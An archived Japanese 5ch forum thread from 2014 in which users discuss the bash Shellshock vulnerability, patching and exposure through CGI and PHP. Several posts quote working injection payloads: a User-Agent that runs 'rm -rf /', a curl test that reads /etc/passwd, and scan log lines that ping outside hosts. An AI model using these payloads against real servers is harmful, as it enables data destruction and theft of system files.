5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

Linuxがかなりヤバいらしい、「bash」シェルに重大な脆弱性 [612136408]

1 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:40:41.58 ID:Zm+dUkuS0 ?2BP(1000)

LinuxなどのUNIX系OSで標準的に使われているシェル「bash」に極めて重大な脆弱性が見つ
かり、9月24日に修正パッチが公開された。
攻撃者がbashにコマンドを送って任意のコードを実行できる可能性が指摘されており、米
セキュリティ機関のSANS Internet Storm Centerなどはパッチ適用を急ぐよう呼び掛けている。

関係各社のアドバイザリーによると、bashで特定の細工を施した環境変数を処理する方法
に脆弱性が存在する。
悪用された場合、攻撃者が環境制限をかわしてシェルコマンドを実行できてしまう恐れが
あり、特定のサービスやアプリケーションでは、リモートの攻撃者が認証を経ることなく
環境変数を提供することも可能になる。

この脆弱性は、多くの一般的な設定でネットワークを介して悪用できるとされ、特にbash
がシステムシェルとして設定されている場合は危険が大きい。攻撃経路にはCGIスクリプト
やOpenSSHが使用できるという。
RedHatやDebianなどの主要Linuxディストリビューターは、この問題を修正するパッチをリ
リースした。

この脆弱性について解説したAkamaiのブログでは、対策として(1)bashを新しいバージョ
ンに更新する、(2)bashを代替シェルに入れ替える、(3)変数サービスへのアクセスを
制限する、(4)脆弱性のあるサービスへのインプットにフィルタをかける――などの方法
を紹介している。

2 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:41:09.19 ID:WnRgsvOG0
どうでもいいだろw

3 :番組の途中ですがアドセンスクリックお願いします:2014/09/25(木) 13:42:25.91 ID:+3i+4RK70
鯖屋にとっては一大事じゃねこれ

4 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:42:51.66 ID:QMAmxh4r0
セットアップと同時にzshですし

5 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:43:16.02 ID:HBb38VwU0
ヤバイ  ←ヤバくない

6 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:44:04.21 ID:1YHZM5ts0
csh厨のステマ

7 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:44:35.20 ID:gF0G0B+00
せっかくbashならマカーも叩けるのになんでlinuxにしちゃうのかな

8 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:46:16.00 ID:G9t8wtgW0
記事を読んで10秒後には対処完了出来るのはLinuxの良いところだ

9 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:46:37.45 ID:HBb38VwU0
使って無い人「なるほど分らん」
使ってる人「パッチ当てかあ・・」
ヤバくない。

10 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:46:46.36 ID:jCtU0j6i0
バスカーッシュ

11 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:47:24.61 ID:s2zLXpck0
Webサーバに出すUAで管理が緩いのは全消しすら出来るのは怖い

12 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:48:40.22 ID:Zm+dUkuS0 ?2BP(1000)

http://www.itmedia.co.jp/enterprise/articles/1409/25/news042.html
ソース貼り忘れた

13 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:49:06.99 ID:ymHQoXFg0
http://i.imgur.com/sFiMb4v.jpg

14 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:50:06.31 ID:eCfzy2aS0
zshは?

15 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:50:46.93 ID:cm4XYQnI0
プロはcsh

16 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:51:46.35 ID:cI2bocul0
ケンモメンが騒いでないって事は結構深刻な事態くさいな

17 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:51:50.78 ID:qONBTDNF0
巨大化し続けたbashをshとして利用した弊害
ファイル領域なんていくらでも余ってんだから今後はコンパクトで安全で手を付けられないなshが用意されるだろう

18 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:51:54.92 ID:thMKTNlC0
これはあかん

19 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:51:58.08 ID:qw0/9dmZi
パッチの出ない古いMac終了のお知らせか

20 :.:2014/09/25(木) 13:52:02.90 ID:jQlRubmc0
bashなんて使わねーな
FreeBSDでzshだな

21 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:53:06.34 ID:G0vVqFm60
redhat系はzsh使ってるやつ多いだろ

22 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:53:10.70 ID:oG4iPADP0
# yum update bash
# /sbin/ldconfig

はい、終わり。
やっぱLinux最高だわ

23 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:54:03.09 ID:qONBTDNF0
>>20
ユーザ環境はともかく
システムはzshじゃないべ

24 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:54:27.75 ID:kTMhOYkX0
>>1
> RedHatやDebianなどの主要Linuxディストリビューターは、この問題を修正するパッチをリリースした。

もう終わってんじゃねえか

25 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:55:28.51 ID:1xdKGtiG0
bash自体使ってないわボンクラ

26 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:55:30.40 ID:nGK6SRCL0
yumしろyum

27 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:55:58.27 ID:qw0/9dmZi
>>22
ldconfig要るの?

28 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:56:24.09 ID:zWsKhatY0
普通の人はFreeBSDでtcshを使うよね
bashを使うなんて甘え

29 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:58:32.51 ID:oG4iPADP0
>>27
システム再起動できるならそれに越したことはない

30 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:58:39.53 ID:0Bn4oBrd0
マジでw こんなことあるんだな

31 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:59:13.40 ID:TheD25I50
全然やばくねぇ

32 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:59:16.93 ID:KTsq0/wW0
ログインでzshになる様に環境変数いじってるけど、bash外してしまったら
PCが立ち上がらなく成りそうだな

33 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 13:59:19.38 ID:wkgvU4Ju0
おいらもtcshだは

34 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:00:32.19 ID:0FYCsGES0
よりによってbashかよ面倒くせえ

35 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:01:50.63 ID:ZbjhBLV40
zsh最強伝説

36 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:02:14.23 ID:OI5WrZS/0
システムシェルがbashとかキチガイかよw
普通shだろ

37 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:02:26.53 ID:Dy/OWflR0
現実問題外部にシェルにアクセスさせる経路なん晒さんだろ
あるとすれはそれは既にセキュリティーホール

38 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:03:03.66 ID:AbUAGzOC0
ディストリがアップデートしてくれてんなら特に問題ないは

39 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:04:28.15 ID:n77mMer30
商用UNIXはbashなんかデフォじゃ入ってないもんな

40 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:04:40.96 ID:qONBTDNF0
>>36
修造先生、こいつです

41 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:05:53.05 ID:e4lZypEZ0
Blog: bashの脆弱性がヤバすぎる件 -- x86-64.jp - くりす研
https://x86-64.jp/blog/CVE-2014-6271
> User-Agent: () { :; }; rm -rf /

42 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:05:55.89 ID:KTsq0/wW0
こっちもかよ。。 ┐(´д`)┌

「NSS」ライブラリに脆弱性、「Firefox」「Thunderbird」「Google Chrome」が更新 [956093179]
http://fox.2ch.net/test/read.cgi/poverty/1411621414/

43 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:06:26.20 ID:nCXyU6j50
スマホってbash入ってんの?

44 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:06:49.10 ID:w/Dh6a4y0
これはwebサーバには当てないとまずいかな。
いったい何台あるんだろう・・・

45 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:06:54.24 ID:WDXJe3f50
バアアアアアアアアアアアアアアアアアアアアアアアアアアアアアッシュwwwwwwwwww

46 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:07:18.29 ID:cm4XYQnI0
シェルが無ければ何もできない若者が増えている

47 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:07:40.78 ID:nIVEjLnO0
一発さくっとやるだけだからいいんだけどさー
誰かもっと早く気がつけよつかえねーなー

48 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:08:45.87 ID:3INAMY4J0
ヒューマノイドタイフーンの仕業か

49 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:09:31.94 ID:9AhHYO/m0
ちょっと意味が分からないんだけど
そもそもbash叩ける環境ならなんでもできるだろ?

50 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:10:09.94 ID:8vERn83z0
しかしこのセキュリティホールに気がついた人はすごいな
こういう人をハッカーというんだろう

51 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:10:43.86 ID:Dy/OWflR0
bashをCGIインタプリタに使ってる訳でもなけりゃ大丈夫だろ
後は無闇にsystem関数使ったシェルスクリプト実行させる糞コードな

52 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:15:09.53 ID:JU78kORQ0
>>41
第三者にシェルを触らせる状態(共用レンタルサーバ等)じゃなければ問題ってことか
じゃあどうでもいいわ

53 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:17:25.67 ID:qONBTDNF0
http://www.walbrix.com/jp/blog/2014-09-bash-code-injection.html

#!/usr/bin/python


シーバングもシェルからpythonを起動してるからアウトだってよ

#!/usr/bin/env ruby

そういやこれとかもシェル起動してるもんな

54 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:20:36.19 ID:1xdKGtiG0
>>49
せやろな

55 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:22:25.41 ID:5IUQp4nH0
侵入し放題だなこれ

アップデートしないやつなんていくらでも居るから

56 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:24:16.87 ID:qONBTDNF0
ルーターとかどうすんのよ

57 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:27:26.46 ID:wGr4Rbjo0
外患がbash触れる場所まで来てる時点で終わり

58 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:27:28.82 ID:Dy/OWflR0
>>53
再現しねーな

$ curl -A "() { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd" http://****/test.cgi
Hey, I'm a Python script so wouldn't be affected, right?
Filesystem Size Used Avail Use% Mounted on
rootfs 18G 755M 17G 5% /
udev 10M 0 10M 0% /dev
tmpfs 25M 76K 25M 1% /run
/dev/vda 18G 755M 17G 5% /
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 254M 0 254M 0% /dev/shm

$ bash --version
GNU bash, version 4.1.11(2)-release (x86_64-unknown-cygwin)
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

shbangの解釈ってカーネルがやんじゃねーのか?

59 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:30:07.15 ID:ZRVm/hQf0
PHP経由でも実行できるみたいだね
調子に乗ってVPS借りて放置してる人たちはやばいかも
http://d.hatena.ne.jp/Kango/20140925/1411612246

60 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:36:16.46 ID:q9WTVb5Y0
バスカッシャーは死に絶えたか

61 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:39:03.22 ID:nVX/kbv+0
組み込みLinux使ってるネットワーク装置は
みんなファーム入れ替えないといけないのかな

62 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:41:19.86 ID:qw0/9dmZi
>>61
Webアクセスされなければ良いんでない?

63 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:48:40.45 ID:91GEriqX0
>>61
組み込み系でbashはでかいし重いからbusyboxが殆どじゃないかな

64 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 14:54:47.13 ID:AnAPxSV00
>>36
リスト使って書いたシェルスクリプトがエラー吐く。何で?
=> Reason::Mintはshがashになってました。bashに変えて完了。

65 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 15:13:29.33 ID:gGdevAkF0
昨日updateきてたわ

66 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 15:56:03.68 ID:19AQWOPe0
redhatは「パッチは不完全だった。今ちゃんとしたの作ってる最中」って言ってるな
https://access.redhat.com/articles/1200223

あぷで来たからって安心してるわけにはいかんみたいだ

67 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 15:57:08.05 ID:GY2rFUZe0
ASUSよりはマシ

68 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 16:00:49.63 ID:BJbU0CdL0
>>66
一応、ワークアラウンドは提示してくれてるけどLD_PRELOADで読ませるというやっつけ。
httpdだけ何とか!って感じ

69 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 16:02:23.78 ID:m7kFjBGK0
>>66
まじか・・・

70 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 16:04:17.19 ID:y2Xdi3pu0
>>24
Linuxの脆弱性が今までどんな影響を及ぼしてきたかを知ってれば
これで終わりには程遠いってわかるはずだがな

71 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 16:07:14.71 ID:QjFAjPDf0
これphpやCGIがやばい

72 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 16:07:19.79 ID:4F0XzA9e0
dmzに置いてあること多いもんな

73 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 16:08:41.83 ID:QjFAjPDf0
これphpやCGIがやばい

74 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 16:10:01.44 ID:3bFGgFeb0
ubuntuもうパッチきてるな

75 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 16:11:16.38 ID:3bFGgFeb0
正式名称Bourne Again SHellなんだな

76 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 16:13:41.90 ID:BJbU0CdL0
>>74
それは不完全なバージョンだ >>66
こういうニュースは普通、主要ディストリビューションが対応終えてから流されるから
ニュース出た時にはUbuntu対応済み、Redhat系もな。ただ、派生バグが残ってるから、まだだめ。

77 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 16:13:57.72 ID:h7ZwQ0X10
20年くらい前に、これの対処をしたような気がするんだが……

78 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 16:14:59.56 ID:h7ZwQ0X10
CGIってまだ使われてるんだ

79 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 16:20:29.14 ID:G0vVqFm60
ブラウザハッキングだよねcgiを内部から操作するってネタだけど
その時発掘されまくってパッチ当てみたいな時流はあったような気がするんだけど

80 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 16:21:53.35 ID:NgD+J9t20
GNUからdiff取ってきたらディストリビューターが何年も前に
修正してる部分が含まれてた

81 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 16:56:38.00 ID:NfPFfmuI0
普通のデスクトップユーザーは関係ないけどCGI公開してる奴はヤバいな
やっぱ/bin/shがbashってのはヤリスギだったんだよ

82 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 17:17:57.07 ID:SEOUFcco0
DHCPサーバに仕掛け作れば、DHCPクライアントをターゲットに出来るってさ
MacもLinuxも終わってる
早くWindowsにスイッチした方がいいよ
ずっと放置されてた脆弱性だから、既に手遅れの可能性あるが

83 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 17:23:17.99 ID:7/CD5osQ0
Linuxmint使ってるんだがどうすりゃいいんだよプロたちよ
早く丁寧に教えろ

84 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 17:26:46.01 ID:K4ZIdcWU0
>>83
updateがくるから、それを待ってればいい

85 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 17:38:09.59 ID:NgD+J9t20
早速Webサーバにスキャンが来てる
> 89.207.135.125 - - [25/Sep/2014:16:57:18 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 304
> "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

サーバ管理ソフトのcPanel狙いかな

86 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 17:43:59.48 ID:JU78kORQ0
cgiでも実行できるのか
あぶねーな

87 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 17:48:06.77 ID:YN71k38f0
cgiが駄目じゃどうしようもないんじゃ・・・
#!/usr/bin/なんとか
系は全滅なんでしょ?

88 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 17:49:24.92 ID:cm4XYQnI0
cgiが駄目ってどういう事?教えてサーバ管理者さん

89 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 17:49:25.34 ID:J72WsKTb0
大規模サービスを運用してる会社は涙目だろうな。
そうじゃないやつらはyum(apt-get) updateでもしとけ

90 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 17:51:16.48 ID:JD6Mzu41i
手軽だしアップデート放置してる会社は攻撃されそう

91 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 17:57:12.91 ID:7/CD5osQ0
>>84
thx
xpからの乗り換えだからまじで分からないんだ助かる

92 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 18:02:58.16 ID:pSTLMtZd0
なんも知らずにtcsh使ってる能無しですいません

93 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 18:05:37.58 ID:dw8ZAIVL0
kshでもあぶない

sh (AT&T Research) 93s+ 2008-01-31

94 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 18:20:06.33 ID:eZtcGHx10
まじかよ・・・
ubuntuはウィルスとか平気って言うから導入したのに・・・

95 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 18:24:43.64 ID:A7GA81Oq0
ubuntu派生ユーザーだけど1に何が書いてあるのかまったくわからない

96 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 18:41:57.07 ID:1PSGFsmT0
うわーマジかよ更新しなきゃいけない…
面倒だからbash消そうかな

97 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 18:42:17.15 ID:Y+j8XIb30
>>95
なんていうか、ユーザーの操作をOSに伝えるための仕組みの部分に脆弱性があったというお話

98 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 18:43:45.05 ID:1PSGFsmT0
つーかこれ2chも影響受けるよね?ちょっと試してみる

99 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 18:48:39.72 ID:1PSGFsmT0
ああシェルコマンド実行してる関数があると影響を受けるのね
つまりメールフォームとかよくsendmailをopenしてるけどそういうのもアウトと

100 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 18:51:09.53 ID:wGr4Rbjo0
linuxインストール後、真っ先にやる事リストにシェルの入れ替えしてた私は高見の見物だが

くだんねースレがパート化してて、このスレ沈んでるのが理解できん

101 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 18:55:23.35 ID:1PSGFsmT0
a

102 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 18:59:13.03 ID:eeET1m6G0
漢は黙ってzsh

103 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:08:12.20 ID:i7W9vEwe0
知人の会社が糞PHP屋だが
今回の脆弱性がPHPだろうと影響することが理解出来なくて
社内ではBashなんて外から叩かないじゃん。
というアホなことになってるらしくワロタ

104 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:09:57.20 ID:gvhjSieG0
phpならmod_phpがモロ影響食らうな

105 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:11:08.83 ID:7DWgsPhx0
危険なのはmod_cgiでphp動かしてる場合

106 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:11:31.84 ID:TYpROovv0
かなり便利に使える特権昇格攻撃だなこれ
bashが呼べたらジエンドとか怖いわ

107 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:12:05.16 ID:Y+j8XIb30
とはいえ叩けるようなところまで来てたら、この脆弱性とかわりとどうでもいい感

108 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:13:15.96 ID:0zJNwIYb0
やはり実際に情報流出とかしないと盛り上がらないNE!

109 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:17:34.45 ID:i7W9vEwe0
PHPとかでLinuxコマンド叩くときは
systemコールを経由する。

このsystemコールは/bin/shを使う。

/bin/shは、centosとかだと/bin/bashになってる。

で、この脆弱性は、HTTP header経由で
外部から簡単に任意のコマンドを差し込める。

ようするにphp-cgiで
mailとか飛ばしてたり
ファイルアップロードとかしてたりしたら
高確率でアウト

110 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:18:49.07 ID:rYM7XKlz0
ぐだぐだ言わずにパッチ当てりゃええねん

111 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:25:43.38 ID:TlfFB7EM0
>>85
うちもきてたけど、危ないのかどうかわからんw
209.126.230.72 - - [25/Sep/2014:10:47:10 +0900] "GET / HTTP/1.0" 400 349 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"

112 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:27:17.45 ID:ybOYKdTn0
debianだと/bin/sh経由はdashだからセーフかな?

113 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:29:13.61 ID:1PSGFsmT0
User-Agent に仕込む例が多いが、実際は Cookie でもどこでも突っ込めるのでアクセスログにそれらしき物が無くても注意が必要

114 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:29:50.71 ID:6D2q3fsH0
tcshだろ

115 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:31:35.20 ID:Qeh7hJ8P0
Windows最高や!

116 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:31:49.69 ID:42/bUWqo0
シェル呼び出すと親プロセスのstdinが継承されるってこと?

117 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:38:46.95 ID:0zJNwIYb0
官庁とか自治体の古いcgiサイトとか楽しそう

118 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:46:18.62 ID:TlfFB7EM0
インスコしてから一度もアップデートかけたことがなかったが、ちょっとアップデートしてみたw

119 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:47:48.72 ID:csgl0Fga0
これ結構な騒ぎになっててワロタ
鯖管とか大変そうだな

120 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:48:47.74 ID:HzVB1vl70
マジで死ぬ。
しかもまともな対策取れねーし、やられたがどうか過去ログ終える次元じゃねーし。

121 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:50:17.15 ID:TpcJkP6q0
だから昨日夜に大きなうpだて来てたんか
いつも以上に色々落として来てたから何事かと思ってた

122 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:51:02.60 ID:TlfFB7EM0
今アップデートしてるから、専ブラは使いたくない
久しぶりに2ちゃんねるのサイトを見たw

123 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:54:53.40 ID:Qeh7hJ8P0
普段から偉そうな会社の自称SE()セキュリティー担当()はどうするんだろうw

124 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 19:59:14.08 ID:7e8hfi5z0
なにこれ、tcsh大勝利なの?

125 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 20:15:47.39 ID:zMthAAzI0
去年からlinuxはボロボロね

126 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 20:30:19.12 ID:nZrZOEOW0
とりあえず対処したけどなんでこうなるの

127 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 20:31:52.32 ID:4RyUFrkB0
そもそもこの脆弱性をどうやって仕込むの?
馬鹿がコマンドをシェルに直接流し込んでるとかじゃないと仕込めないんじゃねえの?

128 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 20:41:41.13 ID:tzkBISu30
bashを使ってないマイナーなディストリビューションも一応あるけど
努力してメジャーになったbashの方がボロボロになるのは残念だな

129 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 20:42:25.10 ID:q+iI9TDJ0
ubuntu起動してくるか

130 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 20:49:31.17 ID:i7W9vEwe0
>>127
上にあるけど、CGI使ってるレッドハット系は全部アウトだよ

131 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:02:43.40 ID:h7ZwQ0X10
「オープンソースはバグがあっても自然に直るから安心」

132 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:08:12.78 ID:zMthAAzI0
一昨日くらいからいっぱいupdateがくる

133 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:08:45.80 ID:yC6JmVJi0
freebsdで良かったわ

134 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:09:34.15 ID:DeeB+g2J0
>>44
dmzにおいてる奴な

135 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:11:28.28 ID:uI/M0Lhg0
bush使わなかったらいいだけだよな
zshでも使おう

136 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:12:58.75 ID:j9R1eaU90
もうほとんどのディストリでパッチが出てるぞ

・・・と5回ぐらいは書かれていると見たがどうか

137 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:13:40.96 ID:J4F/q6SP0
shellくらいは自作しとけ

138 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:13:45.35 ID:RpIyboIL0
アップデートが昨日来てたな

139 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:13:55.18 ID:G1pLUhPv0
暫定らしいけどな・・

140 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:13:59.78 ID:DeeB+g2J0
>>103
phpのconfでローカルたたけ無くしてるんだろ
お前アホすぎ喋んなど素人のカス
死ねよ

141 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:14:46.23 ID:2UA0uwRui
>>139
暫定というか修正漏れがあったそうな

142 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:16:13.77 ID:j9R1eaU90
>>137
そう言えば昔作ったことがあるのを思い出した
何にもしない、標準入力を読んで捨てるだけのshell

143 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:16:59.95 ID:i7W9vEwe0
>>140
ローカルなんて叩く必要ないんだけど
どういう意味?

PHPの場合、組込み関数が/bin/sh使うから問題なんだけど

144 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:17:03.43 ID:dckaXrUZ0
貧乏人発狂

145 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:18:13.75 ID:oEuvzoK40
明日会社行きとうない
この件での調査依頼たくさん来るんだろ・・・

146 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:22:48.31 ID:h7ZwQ0X10
大学のゼミでやったな。シェル作り。

147 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:23:41.47 ID:G1pLUhPv0
>>142
どっかのサーバーを乗っ取った後、後からログインしてくる管理者向けのログインシェルとして提供するんですね
わかります。

148 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:24:01.78 ID:Qeh7hJ8P0
Windowsの方がいいな
全部マイクロソフトのせいにすりゃいいしw

149 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:24:52.31 ID:nvgmhtu40
csh使ってるから関係ない

150 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:25:17.06 ID:DeeB+g2J0
>>143
すまん
因みにどんなビルトイン関数がやばい?

151 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:25:45.15 ID:jan1IYQl0
zsh最強伝説

152 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:26:14.10 ID:i7W9vEwe0
ちなみに今のパッチは暫定対応で
既に回避コードが存在する。

だからbash使うななんて極論になってるが

